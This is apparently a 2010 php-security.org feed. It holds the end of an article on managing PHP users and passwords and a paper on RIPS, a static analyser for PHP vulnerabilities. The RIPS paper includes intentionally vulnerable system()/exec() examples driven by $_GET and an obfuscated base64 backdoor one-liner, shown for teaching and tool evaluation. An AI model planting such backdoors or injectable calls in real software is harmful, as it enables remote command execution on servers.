Please note that this lets you experiment with very basic password strength checking (with a trivial hard-coded policy) even if you have not yet installed passwdqc.

Finally, introduce uses of the function into two places in the program – when creating a new user:

if ($op === 'new') {
    if (($check = my_pwqcheck($pass, '', $user)) !== 'OK')
        fail($check);

and when changing a user’s password:

    if ($op === 'change') {
        $stmt->close();

        $newpass = get_post_var('newpass');
        if (strlen($newpass) > 72)
            fail('The new password is too long');
        if (($check = my_pwqcheck($newpass, $pass, $user)) !== 'OK')
            fail($check);

We’re done. Now let’s test it – strong passwords and passphrases should be accepted, whereas weak ones should be getting rejected with various messages.

The pwqcheck.php file (with a lengthy comment in it) and this revision of the sample program are found in the
demo5 subdirectory in the accompanying archive (tar.gz, ZIP).

Future work

Someone should to create a PHP extension around passwdqc, making the functions of libpasswdqc available for use from PHP scripts.

Timing attacks

Our sample program is vulnerable to probing for valid usernames via timing attacks: its response time differs for existing vs. non-existent users.

We may try to mitigate this by always performing the password hashing step – even if the target username could not be found in the database. First, we need to define a dummy “salt” string (a portion of the hash encoding string) that we’ll use for computing the dummy hashes:

/* Dummy salt to waste CPU time on when a non-existent username is requested.
 * This should use the same hash type and cost parameter as we're using for
 * real/new hashes.  The intent is to mitigate timing attacks (probing for
 * valid usernames).  This is optional - the line may be commented out if you
 * don't care about timing attacks enough to spend CPU time on mitigating them
 * or if you can't easily determine what salt string would be appropriate. */

$dummy_salt = '$2a$08$1234567890123456789012';

Then we introduce the following code right before our call to CheckPassword():

    // Mitigate timing attacks (probing for valid usernames)
    if (isset($dummy_salt) && strlen($hash) < 20)
        $hash = $dummy_salt;


Alternatively, we could use the HashPassword() method, which would generate a new salt for us, but its processing cost is not exactly the same as that of CheckPassword(), so a (smaller) timing leak would remain.

A revision of the sample program with the above changes is included in the demo6 subdirectory in the accompanying archive (tar.gz, ZIP).

Unfortunately, this does not fully eliminate timing leaks – e.g., the MySQL server’s response time may differ – but those leaks are likely smaller than leaks through properly-stretched (purposely slow) password hashing. Yet it might remain possible to probe for valid usernames with a large number of timings for each potential username.

Moreover, major timing leaks will remain if your database contains hashes of mixed types or with different password stretching iteration counts.


Timing leaks are surprisingly difficult to fully deal with. Naive attempts to deal with them such as by introducing random delays (even those in excess of “the signal”) do not work as well as one might expect them to. “Constant time” would do the trick, but it is difficult to achieve, especially when we consider both real and CPU time,
as well as other server resource consumption, which could also be indirectly measured by an attacker.

Other related concerns

There are many other security, usability, and implementation issues closely related to the way a web application manages its users and passwords. Discussing those issues in full detail and with sample code is beyond the scope of this article, yet it is important for you to be aware of them.

Randomly-generated passwords/passphrases

As an alternative to forcing the user to come up with a “strong-looking” password or passphrase, an application may generate and offer a random password or passphrase. (Preferably, the user should also be allowed to pick a suitable password or passphrase of their own, which is the case we’ve been considering so far.)

This is particularly important when new accounts are to be created by an administrator rather than by the users themselves. It would be unrealistic for the administrator to come up with sufficiently different passwords/passphrases for a large number of users, so letting a computer generate those passwords or passphrases is the only reasonable way to go.

One of the ways to implement this is by invoking the pwqgen(1) program from the passwdqc package. Unlike the pwqcheck(1) program discussed above, pwqgen does not require two-way communication via file descriptors, so you may invoke it with the simpler popen() and pclose() functions. Please be sure to check the exit status from the program. Currently, pwqgen only works on systems with /dev/urandom.

It is also possible to try to generate random passwords or passphrases in PHP code and without a dependency on /dev/urandom, but chances are that those passwords or passphrases won’t in fact be as random as they might look – e.g., certain versions of Joomla running with certain versions of PHP are able to generate at most 1 million of different initial passwords, which an attacker can test against a stolen or leaked password hash in a second.

Randomness

It is difficult to obtain a significant amount of cryptographically random data in pure and portable PHP code. As it has been mentioned above, phpass uses /dev/urandom with a fallback to its own pseudo-random byte stream generator. The latter is good enough for salting, but it might not be good enough for other purposes because of the limited amount of entropy that it uses as its input. Other than that, it uses a decent approach. Drupal 7 attempts to reuse a revision of the same code (derived from phpass) to generate all sorts of random tokens, not just salts, and the Drupal developers are trying to process more entropy by feeding certain PHP variables and results of certain PHP function calls into the algorithm.
It is difficult to say just how much entropy is added in this way and whether it is sufficient for a given purpose or not. Additionally, a related concern is that if not enough entropy is being processed, then it might be possible to infer the inputs to the algorithm from the stream of “random” outputs by testing likely inputs in an offline attack. So a reasonable requirement for the inputs could be that they not only are hopefully sufficiently random, but are also not security-sensitive otherwise.

Other algorithms may have additional undesirable properties – such as leaking of the inputs or/and of the internal state in a more direct way, thereby allowing for further “random” outputs to be predicted. Furthermore, if the size or entropy of the internal state is too small, then the entropy of the resulting “random” outputs will also likely be smaller than that of the inputs, and additionally the internal state itself may be inferred in an offline attack given a few “random” outputs, which would facilitate prediction of further “random” outputs.

Overall, it is easier to get this wrong than to get it right, and you’re unlikely to have any assurance of having it done right.

Thus, it is preferable to use a supply of randomness provided by the OS, such as /dev/urandom.

Another option is to run and query a “randomness daemon”, which would accumulate randomness over a long period of time, but this approach has been largely obsoleted by modern Unix-like systems having implemented a randomness pool in the kernel, which is what /dev/urandom is an interface to.

A PHP-specific issue with accessing an external supply of randomness, such as /dev/urandom, is PHP’s lack of support for unbuffered reads. Even if your application only reads, say, 8 bytes, PHP will read an entire buffer worth of data (typically 8192 bytes). This slows things down (albeit not too badly – e.g., it might be taking around 1 millisecond to read 8192 bytes from /dev/urandom on a modern Linux box) and it wastes the precious entropy. A revision of phpass-derived code being considered for Drupal 7 attempts to partially address this by rounding up the number of bytes to read to a multiple of 4096 (considering that PHP would effectively do at least the same anyway) and by maintaining its own buffer for use in subsequent calls to the function. This helps when multiple random “numbers” need to be obtained while servicing a single request, but other than that it is only a partial workaround. It would be best to have the issue fixed in PHP itself (by introducing
optional unbuffered reads).

Resetting forgotten passwords/passphrases

Typically, there’s a way for a user to reset the password (or passphrase) by having the application send a message to the user’s address previously registered in the system. The message may contain the new password (randomly generated) or it may contain a password reset token. The randomness concerns apply.

Here are some questions to consider before implementing this functionality:

Is the new password or passphrase passed in this way permanent or is it temporary (with a forced change upon login and/or an expiration date)?

If a token is passed, is it expiring? How is it to be passed back to the application?

(If it is embedded in an URL, then it is likely to get logged by any web proxy servers involved and by the final web server. Manual entry or copy & paste into a form field might be a little bit safer.)

The token may be randomly generated and stored into the database. Alternatively, it may be computed as a MAC of the username, the user’s address that the token is to be sent to (e-mail or the like), the current timestamp (with certain granularity – e.g., just the date, with no time of day), and maybe other system- and user-specific information, and with a secret key specific to each instance of the application. In the latter case, when a user returns to the system with a token to be validated, the correct token is simply regenerated using all the same data. If the two tokens match, the user is considered authenticated. If they don’t, the check is repeated for the “previous” timestamp (just one time). Thus, these cryptographic tokens automatically expire in 1 to 2 “units of time”, but there’s no way to deactivate them before they expire (e.g., upon first use) unless an extra parameter (such as a password change count for the user) was included under the MAC. The secret key needs to contain enough entropy (say, 80 bits or more) to withstand offline attacks on it given a valid token, and it needs to be different for each instance of the application. Luckily, it does not need to be easy to memorize, so there’s no need to use key stretching, but instead this lack of stretching needs to be compensated for by including more entropy into the key than you would include into a password.

Online password guessing

With password hashing, we’ve been trying to mitigate offline password cracking given stolen or leaked password hashes. However, what about online attacks – where an attacker probes candidate passwords or passphrases by trying to authenticate to our web application with them? Obviously, those attacks would generally run a lot slower than offline ones, yet they might succeed in guessing some of the weakest passwords. For example, simply probing for the password “123456″ might result in almost 1% of accounts getting compromised.

Luckily, by enforcing a password policy meant to prevent easy cracking of our password hashes, we also defeat online password guessing. Thus, if you went for this, then implementing any other measures to deal with online password guessing becomes relatively unimportant. In fact, if you’re confident in your password policy, then you may use very relaxed account lockout settings or none at all in order to avoid causing problems for legitimate users.

On the other hand, if you neglected or decided not to implement password policy enforcement, if you have old passwords that pre-date the policy, or if you have potentially non-compliant passwords for any other reason (e.g., imported from another system), then it may be important to implement countermeasures against online password probing. A typical countermeasure is temporary or permanent account lockout if more than N consecutive authentication attempts fail in X time. This should be further improved to deal with attacks that don’t target a
specific username – e.g., if an attacker tries just the password “123456″ against 1000 different usernames, no single user account will be locked out, yet the attacker might gain access to around 10 accounts (if all of the
usernames exist). A way to mitigate this is to apply per-connecting-address limits on authentication attempts. Yet a distributed attack, such as using a botnet, would defeat that. So enforcing a password policy is a better way to go.

Denial of Service (DoS) attacks

Almost any network service is susceptible to certain kinds of resource consumption DoS attacks. As it relates to the topic of this article, online password probing attacks discussed above may also happen to be DoS attacks, typically unintentionally. Currently, this is not common with web applications, but it does happen with other network services.

Intentional DoS attacks may find and use requests that are even more costly for the server to process – e.g., those involving expensive database queries – or they may simply use an even higher intensity stream of non-targeted requests.

- “Doesn’t password stretching make my web application more susceptible to DoS attacks?”

- With reasonable settings, no. The application developer should provide a default password stretching iteration count that will not make this a problem in practice, and the system administrator may tune this setting to better match a given system’s capacity and expected use pattern. For example, if a web application is not able to handle more than 50 requests per second for other reasons anyway, then having password authentication take 10 ms will not provide a significantly more attractive way of attack. In fact, since different kinds of requests consume server resources differently, perhaps the login request, which does not involve much work besides password hashing on the CPU, won’t be the heaviest. Quite often, disk I/O capacity (and not CPU time) is the scarce resource.

Another potential DoS attack relevant to the topic of this article is through registration of too many user accounts, if your web application is meant to permit for users to self-register. This kind of attack is currently not common in practice – likely because other DoS attacks, which are of less relevance to this article, are more effective. To mitigate this attack, you could implement all sorts of limits – e.g., no more than N user registrations per source IP address per day, no more than M users with the same domain name portion of e-mail address – and require validation of the e-mail address by a “secure token” implemented using a MAC. before the user is added to the database.

Password policy enforcement and usability concerns

It may be inconvenient for many users to have to submit a form only to get their desired password or passphrase rejected (for not being compliant to the policy), then have to come up with another password or passphrase and resubmit.

This may be partially dealt with by summarizing the gist of the policy on the web page with the form – e.g. for passwdqc’s default policy as of this writing you can use:

“A valid password should be a mix of upper and lower case letters, digits, and other characters. You can use an 8 character long password with characters from at least 3 of these 4 classes, or a 7 character long password containing characters from all the classes. An upper case letter that begins the password and a digit that ends it do not count towards the number of character classes used.

A passphrase should be of at least 3 words, 11 to 40 characters long, and contain enough different characters.”

You may also offer randomly generated passwords and/or passphrases. Just do not give any static examples of passwords or phrases that would pass the check.

Another improvement could be to have the web page check the strength of the password or passphrase as the user types it – such as by submitting it to the server every few seconds via Ajax or by duplicating the most critical password strength checks in JavaScript.

(Indeed, this feature would only work if JavaScript is enabled in the user’s web browser.)

Neither approach is perfect: the former would cause extra server load and the latter would not duplicate passwdqc’s actual checks exactly (they are a bit too complicated to fully duplicate them in JavaScript). Yet if you’re so inclined, the C function to look at is is_simple() in passwdqc_check.c. A hybrid approach may work best – only bother the server with checking passwords or passphrases that pass the JavaScript checks.

Indeed, actual policy enforcement should be taking place on the server when the form is finally submitted anyway.

Challenge/response authentication

Although the standard way to protect web application passwords while in transit is with SSL (https URLs), it may also be possible to protect them to a very limited extent by implementing challenge/response authentication. On the web browser side, this would be implemented in JavaScript (with a fallback to sending the password in the clear when JavaScript is not available).

Unfortunately, implementing this involves trade-offs, and the implementations I’ve seen so far are not great – they require that plaintext-equivalents of passwords or at best relatively weak password hashes be stored on the server, which is unacceptable when the number of user accounts is large (because the cost of recovery from a security compromise of the server or, say, of a backup dump becomes prohibitive).

Although storage of plaintext-equivalents on the server can be avoided, certain other issues remain (e.g., it might not be possible to implement much password stretching in this way due to the slowness of JavaScript code).

So I do not currently recommend this approach (major advances in this area would need to occur first), yet I felt that it needed to be mentioned in here.

Sessions

Once a user logs in, a session needs to be created – such as by using PHP’s session handling capabilities or otherwise. There are plenty of potential issues related to session management, which could be the subject of a separate article. Since this is not very closely related to user and password management, since this is such a complicated topic, and since this article is too long as it is, I am leaving this topic completely beyond the scope of this article.

Licensing

This article, not including the embedded code snippets, is
Copyright (c) 2010 Alexander Peslyak.
All rights reserved.

Permission is hereby granted to reproduce and redistribute the article and its
accompanying archive in their original form (unmodified and electronic only).

Non-exclusive rights are hereby granted to SektionEins GmbH to reproduce,
distribute, and advertise the article including but not limited to on the
http://php-security.org website,
in printed and/or electronic advertisements, and in all other media.

Others interested in reproducing and/or redistributing the article other than
in its original form and/or other than electronically should contact the
copyright holder for an express permission.

No copyright to the source code snippets found in this article and to the
sample programs included in the accompanying archive is claimed, and they’re
hereby placed in the public domain.
Please feel free to reuse them in your programs.

In case this attempt to disclaim copyright and place the source code snippets
and the sample programs in the public domain is deemed null and void, then the
snippets and the programs are Copyright (c) 2010 Alexander Peslyak and they’re
hereby released to the general public under the following terms:

Redistribution and use in source and binary forms,
with or without modification, are permitted.


(This is heavily cut-down “BSD license”, to the point of being copyright only.)

]]>
http://php-security.org/2010/05/26/mops-submission-10-how-to-manage-a-php-applications-users-and-passwords/feed/ 0
MOPS Submission 09: RIPS – A static source code analyser for vulnerabilities in PHP scripts http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/ http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/#comments Mon, 24 May 2010 10:29:50 +0000 admin http://php-security.org/?p=338 During the last hours of the CFP we received the following MOPS submission by Johannes Dahse. It is a static code analysing tool for PHP based on the tokenizer extension.

RIPS – A static source code analyser for vulnerabilities in PHP scripts

Johannes Dahse

[PDF Version]  [Download RIPS]

Table of Contents

  1. Introduction
  2. The concept of taint analysis
  3. The tokenizer
  4. The web interface
  5. Results
  6. Limitations and future work
  7. Related work
  8. Summary

1. Introduction

The amount of websites has increased rapidly during the last years. While websites consisted mostly of static HTML files in the last decade, more and more webapplications with dynamic content appeared as a result of easy to learn scripting languages such as PHP and other new technologies. In fact, PHP is the most popular scripting language on the world wide web today. Besides a huge amount of new possibilities, the new web 2.0 also brings a lot of security risks when data supplied by a user are not handled carefully enough by the application. Different types of vulnerabilities can lead to data leakage, modification or even server compromise. In the last year, 30% of all vulnerabilities found in computer software were PHP-related 1.

In order to contain the risks of vulnerable webapplications penetration testers are hired to review the source code. Given the fact that large applications can have thousands of codelines and time is limited by costs, a manual source code review might be incomplete. Tools can help penetration testers to minimize time and costs by automating time intense processes while reviewing a source code.

In this submission a tool named RIPS is introduced which automates the process of identifying potential security flaws in PHP source code by using static source code analysis. RIPS is open source and freely available at
http://www.sourceforge.net/projects/rips-scanner/. The result of the analysis can easily be reviewed by the penetration tester in its context without reviewing the whole source code again. Given the limitations of static source code analysis, a vulnerability needs to be confirmed by the code reviewer.

2. The concept of taint analysis

By doing source code audits over and over again, it is noticed that the same procedure of finding security flaws is done frequently. First, potentially vulnerable functions (PVF) like system() or mysql_query() which can lead to certain vulnerabilities are detected and then their parameters consisting of variables are traced back to their origin. If the parameters with which the PVF has been called can be specified or modified by a user this parameter is marked as tainted and the PVF call is treated as a potential security
vulnerability. Sources for user input in PHP can be the global variables $_GET, $_POST, $_COOKIE and $_FILES as well as some $_SERVER and $ENV variables 2. Also several functions that read from databases, files or enviroment variables can return user input and taint other variables. When parameters are traced backwards, the conditional program flow and potential securing actions have to be taken into account to avoid false positives. The following two PHP scripts use the PVF system() that executes system commands 3:

Example 1:

<?php
    $a = $_GET['a'];
    $b = $a;
    system($b, $ret);
?>

Example 2:

<?php
    $a = $_GET['a'];
    $b = 'date';
    system($b, $ret);
?>

While the first example shows a remote command execution vulnerability where a user can specify any command to be executed given by the GET parameter a, the second example is not a vulnerability because the command being executed is static and cannot be influenced by an attacker.

In order to automate the process of finding security flaws, a large list of PVF is build consisting of PHP functions that can lead to a security flaw when called with unsanitized user input. This list includes quite unknown PVF like preg_replace_callback() or highlight_file() to name a few exotics. RIPS in its current state scans for 139 PVFs.

Once a PVF is detected the next step is to identify its parameters. In the first example these are the variables $b and $ret. Those variables are compared to previously declared variables.
This is where line 3 is found which assigns $a to $b. Again $a will be compared to previously declared variables and so on. If a parameter originated from user input the PVF call is treated as a potential vulnerability. The tree of traced parameters is then shown to the user in reversed order who can decide between a correct vulnerability or a false positive.

Scan result for example 1:

4 : system($b ,$ret);
    3 : $b = $a;
        2 : $a = $_GET['a'];

It is important to trace only significant parameters to reduce false positives. The second parameter of the function system() declares the return value of the command execution to the variable $ret in our example. Therefore the second parameter $ret should not get traced because a previously defined variable $ret with user input can lead to false positives. Another source for false positives is securing actions taken by the developer.
The following example is considered as safe:

<?php
    $a = $_GET['a'];
    $b = escapeshellarg($a);
    $c = 'cal ' . $b;
    system($c, $ret);
?>

The function escapeshellarg() prevents the attacker to inject arbitrary commands to
the system call 4. Also a typecast of $a to integer assigned to $b would prevent a command execution vulnerability. Therefore a list of securing functions is assigned to each element in the PVF list as well as a global list of securing or eliminating functions (e.g.
md5()) and actions (e.g. typecasts) is defined. Because securing can be implemented wrongly, the user has the option to review all detected potential vulnerabilities with securing operations.

Here is an example of a PVF entry for the function system() with the significant parameter
(the first) and securing functions (escapeshellarg() and escapeshellcmd()):

"system" => array (
    array(1), array("escapeshellarg", "escapeshellcmd")
);

The significant parameter can also be a list of parameters or 0 if all parameters should be treated as dangerous. Each PVF can be configured precisly like that. The difficult part is to take the program flow and code structures into consideration while tracing parameters.

3. The tokenizer

In order to analyse a PHP script correctly, the code is split into tokens. For this, the PHP function token_get_all() 5 is used. Each token is an array with a token identifier which can be turned into a token name by calling token_name() 6, the token value and the line number. Single characters which represent the codes semantic appear as a string in the token list.

Example 4:

<?php
    $a = $ GET['a'];
    system($a, $ret);
?>

Token list of example 4 generated by token_get_all():

name: T_OPEN_TAG            value: <?php    line: 1
name: T_VARIABLE            value: $a   line: 2
name: T_WHITESPACE          value:      line: 2
                        =
name: T_WHITESPACE          value:      line: 2
name: T_VARIABLE            value: $_GET    line: 2
                        [
name: T_CONSTANT_ENCAPSED_STRING    value: 'a'  line: 2
                        ]
                        ;
name: T_WHITESPACE          value:      line: 2
name: T_STRING              value: system   line: 3
                        (
name: T_VARIABLE            value: $a   line: 3
                        ,
name: T_WHITESPACE          value:      line: 3
name: T_VARIABLE            value: $ret     line: 3
                        )
                        ;
name: T_WHITESPACE          value:      line: 3
name: T_CLOSE_TAG           value: ?>   line: 4

Once the token list of a PHP script is obtained, there a several improvements made to analyse the tokens correctly. This includes replacing some special characters with function names (like `$a` to backticks($a) which represent a command execution 7) or adding curly braces to program flow constructs where no braces have been used (in example if or switch conditions with only one conditional line following 8). Also all whitespaces, inline HTML and comments are deleted from the token list to reduce the overhead and to identify connected tokens correctly.

Then, the source code can be analysed token by token 9. The goal of RIPS is to analyse the token list of each file only once to improve the speed. It is looping through the token list and identifies important tokens by name. Several actions are performed when one of the following token is identified.

  • T_INCLUDE: If a file inclusion is found, the tokens of the included file will be added to the currented token list as well as an additional token that identifies the end of the included tokens. Also there is a note about the success of the inclusion added to the output if information gathering is turned on. If the file name consists of variables and strings, the file name can be reconstructed dynamically. A internal file pointer keeps
    track of the current position in the included files. Also each file inclusion is checked for a file inclusion vulnerability.
  • T_FUNCTION: If a new function is declared, the name and the parameters are analysed and saved for further analysis.
  • T_RETURN: If a user-defined function returns a variable, this variable will get traced backwards and is checked for securing actions. If the returned variable is sanitized by a securing or neutralizing function like md5() or a securing action like a typecast, this function is added to the global securing function list so that user-defined sanitizing functions can be identified. If the return value is tainted by user input, the function is added to a list of functions that can taint other variables when assigned to them.
  • T_VARIABLE: If a variable declaration is identified the current scope is checked and the variable declaration is added either to a list of local (if the token is found in a function declaration) or to a global variable list together with the according line of the source code.

    Some examples for variable declarations could be:

       $a => $a = $_GET['a'];
       $b => $b = '';
       $b => $b.=$a;
       $c['name'] => $c['name'] = $b;
       $d => while($d = fopen($c['name'], 'r'))

    Those examples shows that it is not sufficient to only parse "=" and ";" in the token list to identify every variable declaration correctly. RIPS uses this list to trace variables found in PVF calls backwards to their origin. Also all dependencies are added to each variable declaration to make a trace through different program flows possible.

  • T_STRING: If a function call is detected, the tool checks whether the function name is in the defined PVF list and therefore a function call to scan further. A new parent is created and all parameters configured as valuable will get traced backwards by looking up the variable names in the global or local variable list. Findings are added to the PVF tree as a child. All variables in the previously found declarations will also get looked up in the variable list and added to the corresponding parent. If securing actions are detected while analysing the line of a variable declaration, the child is marked red. If user input is found, the child is marked white and the PVF tree is added to the global output list. Optionally parameters can be marked as tainted if they are tainted by functions that read SQL query results or file contents. Therefore it is possible to identify vulnerabilities with a persistent payload storage.

    If a traced variable of a PVF in a user-defined function declaration depends on a parameter of this function, the declaration is added as child and marked yellow. Then this user-defined function is added to the PVF list with the according parameter list. The list of securing functions is adapted from the securing functions defined for the PVF
    found in this user-defined function.

    At the end, all currently needed dependencies in the program flow are added.

    Example 5:

       <?php
        function myexec($a, $b, $c)
        {
            exec($b);
        }

        $aa = "test";
        $bb = $_GET['cmd'];
        myexec($aa, $bb, $cc);
       ?>

    When the PVF call on line 4 is detected, the parameter $b is traced backwards. It is detected that $b depends on a function parameter of the function declaration myexec. Now the function myexec() is added to the PVF list with the second parameter defined as valuable and the securing functions defined for exec().

    The user-defined function myexec() is now treated as any other PVF function. If a call with user input is found, the call and the vulnerability is added to the output:

    Scan result for example 5:

       4 : exec($b);
           2 : function myexec($a, $b, $c)
       9 : myexec($aa, $bb, $cc);
           8 : $bb = $_GET['cmd'];

    Variable $aa has been declared too but will not get traced back because it has no relevance for the vulnerability.

    Additionally, variables that are traced and declared in a different code structure than the PVF call was found in, will be commented with the dependency for the variable declaration. Dependencies that affect both, stay as global dependency for this parent.

  • T_EXIT, T_THROW: Tokens that can lead to a exit of the program flow are also detected, and the last found control structure the exits depend on (e.g. a if or switch statement) is added to the current dependency list. If a program exit is found in a function declaration this function is added to the list of interesting functions with a note about a possible exit. With this the user can get an overview which conditions have to be made in order to get to the desired PVF call in the program flow.
  • Curly braces {}: All program flow is detected by curly braces, and therefore the tokens have to be prepared in situations where no braces have been used by the programmer. Control structures like if and switch are added to a list of current dependencies. If a PVF is detected in the same block of braces, the dependencies will be added to the parent. A closing brace marks the end of the control structure, and the dependency is removed from the current dependencies list.

Additionally, tokens that identify PHP specialities like extract(), list() or define() are evaluated to improve the correctness of the results. Also a list of interesting functions is defined which identify DBMS or session usage and detected calls are added to the output with a comment as information gathering if the verbosity level is set to do so.

4. The web interface

RIPS can be completely controlled by a web interface. To start a scan a user has to provide a file or directory name, choose the vulnerability type and click scan. RIPS will only scan files with file extensions that has been configured. Addionally a verbosity level can be chosen to improve the results like the following:

  • The default verbosity level 1 scans only for PVF calls which are tainted with user input without any detected securing actions in the trace.
  • The second verbosity level also includes files and database content as potentially malicious user input. This level is important to identify vulnerabilites with a persistent payload storage but it might increase the false positive rate.
  • The third verbosity level will also output secured PVF calls. This option is important to detect unsufficient securings which can be hard to detect by a static source code analysis.
  • The fourth verbosity level also shows additional information RIPS collected during the scan. This includes exits, notes about the success of analysing included files and calls of functions that has been defined in the interesting functions array. On large PHP applications, this information gathering can lead to a very large and unclear scan
    result.
  • The last verbosity level 5 shows all PVF calls and its traces no matter if tainted by user input or not. This can be useful in scenarios where a list of static input to PVF calls is of interest. However, this verbosity level will lead to a lot of false positives.

All found PVF calls and their traces are shown syntax highlighted and devided in blocks to the user. The syntax highlighting of the PHP code can be changed on the fly by choosing from 7 different stylesheets. The color schemes were manually adapted from Pastie and integrated into RIPS own syntax highlighter.

Also a drag and dropable window can be opened to see the original source code by clicking on the file icon. All lines used in the PVF call and its trace are highlighted red in the original code, and the code viewer automatically jumps to the PVF call to allow a quick and easy review of the trace.

Another window can be opened for every detected vulnerability to quickly create a PHP curl exploit with a few clicks by hitting the target icon. Depending on the detected user input there are prepared code fragments which can be combined to create a exploit in a few seconds by entering the parameter values and a target URL. For multi-stage exploits, cookies are supported as well as SSL, HTTP AUTH and a connection timeout.

For further investigations of complicated vulnerabilities, a list of user-defined functions and a list of program entry points (user input) is given to the user which allows him to directly jump into the code by clicking on the name. Also all user-defined functions called in the scan result can be analysed by placing the mouse cursor over the function name. Then the code of the function declaration is shown in a mouseover layer. Jumping between findings in a user-defined function and the according call of this function is also possible.

5. Results

In order to test RIPS, the source code of a internship platform at the Ruhr-University Bochum was scanned. This platform is a virtual online banking webapplication written in PHP and was designed to teach several web application
vulnerabilities during the internship.

At first RIPS was run with verbosity level 1 in order to find PVFs directly tainted with user input and no securing detected. RIPS scanned 17399 lines in 90 files for 139 functions in 2.096 seconds. The following intended vulnerabilities were found:

  • 1/2 reflective Cross-Site Scripting
  • 0/1 persistent Cross-Site Scripting
  • 2/2 SQL Injections
  • 0/1 Business Logic Flaws
  • 1/1 File Inclusion
  • 1/1 Remote Code Execution
  • 1/1 Remote Command Execution

Two false positives occured. Suprisingly, a yet unknown HTTP Response Splitting and another unintended Cross-Site Scripting vulnerability was also detected.

One false positive was a SQL injection wich had been prevented by a regular expression and therefore could not be evaluated as correct sanitization by RIPS. Another false positive occured with a fwrite() call to a logging file. Because of the fact that the file was a text file, and the data was sanitized correctly when read by the application again, this does not lead to a security flaw. However, it is important to know for the source code reviewer in what files an attacker is able to write because this can lead to other vulnerabilities (e.g. when the attacker can write into a PHP file).

A significant false negative is the missing reflective XSS vulnerability. This one could only be detected by reviewing the secured PVF calls when setting the verbosity level to 3. The missing argument ENT_QUOTES in the securing function htmlentities() lead to a false detection of sufficient securing in a scenario where an eventhandler could be injected to an existing HTML element.

To detect the persistent XSS vulnerability, RIPS was set to verbosity level 2 and thus allowing to treat file and database content as tainting input for PVFs. The persistent XSS vulnerability was detected successfully. However this verbosity level also lead to 11 false positives. That is, because RIPS has no information if an attacker can insert data
into the database at all or what kind of table layout is used. Almost all false positives affected a harmless column id whith type integer and auto_increment set.

As expected, the Business Logic Flaw could not be detected by taint analysis for PVF because it uses the applications logic without any PVF.

6. Limitations and future work

The evaluation of dynamic strings that are build at runtime is the main limitation of static source code analysis.
In PHP, the name of a included file can be generated dynamically at runtime. Currently, RIPS is only capable of reconstructing dynamic file names composed of strings and variables holding strings or statics. However, if the file name is constructed by calling functions, the name cannot be reconstructed. Particularly large PHP projects rely on an interaction of several PHP scripts, and a security flaw might depend on several files to work and to get detected correctly. Future work will address this problem. One option could be to combine dynamic and static source code analysis to evaluate dynamic file names. Currently, the best workaround is to rewrite complex dynamic file names to static hardcoded file inclusions.

Also it should be obvious that RIPS is only capable of finding security vulnerabilities that are considered as bugs and not as intended obfuscated backdoors which can easily be hidden with dynamic function names:

$a=base64_decode('c3lzdGVt');$a($_GET['c']);

The same limitation appears for a user-defined securing function that relies on regular expressions or string replacements which can not be evaluated during a static source code analysis. Therefore it is not possible to determine if securing taken by the developer is safe or not in each scenario. This can lead to false positives or negatives. As a compromise, the user has the option to review secured PVF calls.

In the future it is planned to fully support object oriented programming. Vulnerable functions in classes are detected but no interaction with variables assigned to an object is supported by RIPS in its current state as well as classes that implement or extend other classes.

Additionally, it is planned to consider automatic typecasts. Currently a typecast by adding an integer to a string is not recognized and may lead to false positives in certain circumstances.

7. Related work

Various techniques such as flow-sensitive, interprocedural, and contextsensitive data flow analysis are described and used by the authors of Pixy 10, the first open source static source code analyser for PHP written in Java 11. It uses control flow graphs to scan every possible combination of data flow. While Pixy is great in finding vulnerabilities with a low rate of false positives, it only supports XSS and SQL injection vulnerabilities. Both vulnerabilities are the most common vulnerabilities in PHP applications.

The goal of RIPS was to build a new approach of a static source code analyser written in PHP using the built-in tokenizer functions. Unlike Pixy, RIPS runs without any requirements like a database managment system, the Java
enviroment or any other programming language than PHP itself. Also RIPS aims to find a lot more common vulnerabilities including
XSS and SQL injection, but also all kinds of header injections, file vulnerabilities and code/command execution vulnerabilities.

A difference in the user interface is that RIPS is designed to easily review and compare the findings with the original source code for a faster and easier confirmation and exploitation and therefore to give a better understanding of how the vulnerabilities work instead of pointing out that the application is vulnerable in a specific line. Often a vulnerability can be found very fast in the depth of the source code, and the hard part is to trace back under which conditions this codeblock is called. Since static source code analysis can fail for very complicated vulnerabilities, RIPS goal is to do its best at finding flaws automatically but also to provide as much information and options to make further analysis as easy and fast as possible.

Compared to Pixy, RIPS is also capable of finding vulnerabilities with persistent payloads stored in files or databases by using different verbosity levels. A disadvantage compared to Pixy is, that the lexical analyzation of RIPS assumes some good coding practices in the analysed source code to analyse it correctly. In example RIPS assumes that code structures are written line per line and that user-defined functions are declared before they are called. Future work will include to make the lexical analyzation more flexible. Also a lot of research about Aliases in PHP has been done by the authors of Pixy 12 which is not supported by RIPS because of its rareness.

Both tools suffer from the limitations of static source code analysis as described in the previous section.

An extended version of Pixy called Saner 13 has been created to address the problem with unknown user-defined securing actions and its efficiency. It uses predefined test cases to check whether the filter is efficient enough or not.

Additionally, there exist tools like Owasp Swaat 14 which are designed to find security flaws in more than one language but which only detect vulnerable functions by looking for strings. This is sufficient for a first overview of potential unsafe program blocks but without consideration of the application context, real vulnerabilities cannot be confirmed. However, this method with an additional parameter trace can also been forced with RIPS by setting the verbosity level to 5.

8. Summary

In the past, a lot of open source webapplication scanners had been released that aim to find vulnerabilities in a black box scenario by fuzzing. A source code review in a white box scenario can lead to much better results, but only a few open source PHP code analysers are available. RIPS is a new approach using the built-in PHP tokenizer
functions. It is specialized for fast source code audits and can save a lot of time. Tests have shown that RIPS is capable of finding known and unknown security flaws in large PHP-based webapplications within seconds. The webinterface assists the reviewer with a lot of useful features like the integrated codeviewer, a list of all user-defined functions and a connection between both. Found vulnerabilities can be easily tested by creating PHP curl exploits.
However, due to the limitations of static source code analysis and some assumption on the programm code made by RIPS, false negatives or false positives can occur and a manual review of the outlined result has to be made or the verbosity level has to be loosend to detect previoulsy missed vulnerabilities that could not be identified correctly. Also most of the wide spread PHP applications today rely on object oriented programming which is not fully supported by RIPS yet. Therefore RIPS should be seen as a tool that helps analysing PHP source code for security flaws but not as a ultimate security flaw finder.

References

  1. Fabien Coelho, PHP-related vulnerabilities on the National Vulnerability Database
    http://www.coelho.net/php_cve.html
  2. The PHP Group, Predefined Variables
    http://www.php.net/manual/en/reserved.variables.php
  3. The PHP Group, system – Execute an external program and display the output
    http://www.php.net/system
  4. The PHP Group, escapeshellarg – Escape a string to be used as a shell argument
    http://www.php.net/escapeshellarg
